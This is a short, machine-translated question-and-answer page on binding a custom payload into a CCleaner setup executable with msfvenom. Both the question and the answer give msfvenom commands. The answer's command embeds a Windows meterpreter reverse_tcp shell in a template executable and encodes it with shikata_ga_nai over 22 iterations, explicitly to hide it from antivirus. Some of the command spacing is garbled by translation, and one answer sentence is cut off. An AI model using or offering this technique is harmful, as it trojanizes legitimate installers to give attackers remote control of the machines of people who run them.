使用msfvenom将自定义有效负载绑定到ccleaner可执行文件

问题描述 投票:0回答:1

我基本上想将定制的有效负载可执行文件绑定到ccleaner设置可执行文件,我该如何实现?

我尝试过:

msfvenom -x ccsetup559.exe -k -p generic/custom
PAYLOADFILE=/root/Desktop/custompayload.exe -o ccsetup-output.exe
security penetration-testing metasploit
1个回答
0
投票

这是一个旧线程,但对于其他感兴趣的人,它确实应该有一个解决方案。由于您没有提供任何错误信息,我只能猜测。因此,不用猜测,我可以向您展示将有效载荷注入到x86体系结构的现有可执行文件中的正确语法。它使用shikata_ga_nai编码和迭代加密来帮助自己从反病毒软件中隐藏起来,该反病毒软件]

msfvenom -p windows / meterpreter / reverse_tcp --platform windows -f exe -a x86 LHOST = :: IPADDRESS :: LPORT = :: PORT :: -e x86 / shikata_ga_nai -i 22 -x'template.exe'- o output.exe

© www.soinside.com 2019 - 2024. All rights reserved.